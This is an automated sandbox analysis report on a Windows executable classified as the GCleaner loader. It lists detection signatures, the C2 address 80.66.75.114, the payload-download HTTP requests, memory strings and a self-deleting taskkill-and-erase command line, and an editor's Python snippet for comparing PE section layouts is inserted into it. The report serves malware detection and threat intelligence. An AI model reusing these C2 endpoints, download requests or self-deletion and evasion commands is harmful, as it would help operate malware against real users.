Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1500394
MD5: e0e8e64dfad5b7dcae0d8c569c3995a2
SHA1: 307aa823e40f082fb0ff99fb6996d4f34c5abb45
SHA256: 9f860b523257827deceedaf7f95fba8e45e241602003ead07ad41727dbcd2f4c
Tags: exe

Detection

GCleaner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GCleaner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection

Source: http://80.66.75.114/files/download Avira URL Cloud: Label: malware
Source: 0.3.file.exe.740000.0.raw.unpack Malware Configuration Extractor: GCleaner {"C2 addresses": ["80.66.75.114"]}
Source: http://80.66.75.114/files/download Virustotal: Detection: 18%
Source: http://80.66.75.114/6.75.114/add?substr=one&s=two Virustotal: Detection: 9%
Source: http://80.66.75.114/files/download4/files/download Virustotal: Detection: 8%
Source: http://80.66.75.114/files/downloadData Virustotal: Detection: 15%
Source: http://80.66.75.114/ Virustotal: Detection: 16%
Source: http://80.66.75.114/files/downloadP Virustotal: Detection: 12%
Source: http://80.66.75.114/files/downloadN Virustotal: Detection: 8%
Source: http://80.66.75.114/files/downloadL Virustotal: Detection: 9%
Source: http://80.66.75.114/add?substr=one&s=two Virustotal: Detection: 15%
Source: file.exe Virustotal: Detection: 30%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

Networking

Source: Malware configuration extractor IPs: 80.66.75.114
Source: Joe Sandbox View IP Address: 80.66.75.114
Source: Joe Sandbox View ASN Name: RISS-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Source: global traffic HTTP traffic detected:
  GET /add?substr=one&s=two HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 80.66.75.114
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /files/download HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: B
  Host: 80.66.75.114
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/6.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073485392.0000000000893000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=one&s=twoi
Source: file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download
Source: file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download4/files/download
Source: file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download4/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadData
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadL
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadLMEM
Source: file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadN
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/wi
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net

System Summary

Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404530 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00422900 0_2_00422900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004132D4 0_2_004132D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413AB9 0_2_00413AB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004096D0 0_2_004096D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F9937 0_2_005F9937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060353B 0_2_0060353B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F4797 0_2_005F4797
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004088D0 appears 38 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005F8B37 appears 37 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/8@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C51AE CreateToolhelp32Snapshot,Module32First, 0_2_007C51AE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5356
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\57ec410c-7051-447b-81e9-c639cfb7f2c8
Source: C:\Users\user\Desktop\file.exe Command line argument: `a}{ 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Command line argument: P2@ 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Command line argument: `a}{ 0_2_005F4797
Source: C:\Users\user\Desktop\file.exe Command line argument: ,zB 0_2_005F4797
Source: C:\Users\user\Desktop\file.exe Command line argument: dyB 0_2_005F4797
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe Virustotal: Detection: 30%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004083EE push ecx; ret 0_2_00408401
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040FEBA push es; ret 0_2_0040FEBB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060407F push esp; retf 0_2_00604087
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600121 push es; ret 0_2_00600122
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060C575 push ss; retf 0_2_0060C579
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F8655 push ecx; ret 0_2_005F8668
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060467D push esp; retf 0_2_0060467E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7443 push ecx; ret 0_2_007C7444
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C68FD pushfd ; ret 0_2_007C6905
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7117 push ecx; ret 0_2_007C7118
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C81F5 pushad ; ret 0_2_007C81F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C5E78 pushad ; retf 0_2_007C5EB4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9EC4 push ecx; ret 0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9E93 push ecx; ret 0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C871B push es; ret 0_2_007C871C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9F0D push ecx; ret 0_2_007C9F0C
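How the two "Unpacked PE file" lines above are read, as an added example (editor's code, not Joe Sandbox's): the signature lists the section table of the dumped image next to the section table of the file on disk and flags unpacking when the two disagree. The helper below parses the `name:rights;` layout strings from the first of those lines, assuming the left-hand layout is the memory dump and the right-hand one the original file (that ordering is an assumption), and reports sections that appear, disappear or change protection, distinguishing a section that gained execute rights at runtime from a dump whose section table is simply a different PE.

```python
import re

# Section layout strings copied from the "Unpacked PE file" signature above.
# Assumed: left-hand side is the dumped image, right-hand side the file on disk.
DUMP_LAYOUT = ".text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;"
DISK_LAYOUT = ".text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;"

# One "name:rights" entry; rights are any subset of E (execute), R (read), W (write).
ENTRY_RE = re.compile(r"^(?P<name>[^:]+):(?P<rights>[ERW]*)$")


def parse_layout(layout: str) -> dict:
    """Turn '.text:ER;.data:W;' into {'.text': {'E', 'R'}, '.data': {'W'}}."""
    sections = {}
    for entry in filter(None, layout.split(";")):
        m = ENTRY_RE.match(entry.strip())
        if not m:
            raise ValueError(f"unrecognised section entry: {entry!r}")
        sections[m["name"]] = set(m["rights"])
    return sections


def diff_layouts(dump: str, disk: str) -> dict:
    """Compare the in-memory dump against the on-disk file.

    Returns the sections only present in memory, only present on disk, those
    whose protection changed (before, after), and a one-line verdict.
    """
    mem, file = parse_layout(dump), parse_layout(disk)
    added = sorted(set(mem) - set(file))
    removed = sorted(set(file) - set(mem))
    changed = {
        name: ("".join(sorted(file[name])), "".join(sorted(mem[name])))
        for name in set(mem) & set(file)
        if mem[name] != file[name]
    }
    # A section that gained execute rights in memory is the classic sign of
    # code being written at runtime; a different section table altogether
    # means the dump is a different PE than the one loaded from disk.
    gained_exec = [n for n, (before, after) in changed.items()
                   if "E" in after and "E" not in before]
    if gained_exec:
        verdict = "section gained execute rights in memory: " + ", ".join(gained_exec)
    elif added or removed:
        verdict = "section table differs from disk: dump is a different PE"
    elif changed:
        verdict = "section protection changed in memory"
    else:
        verdict = "layouts match"
    return {"added": added, "removed": removed, "changed": changed, "verdict": verdict}


if __name__ == "__main__":
    print(diff_layouts(DUMP_LAYOUT, DISK_LAYOUT))
```

For this sample the dump carries a `.tls` section the file on disk does not have and lacks the file's `.reloc`, with no protection change on the sections they share, so the verdict is that the dump is a different PE rather than a stub that unprotected its own code.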
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
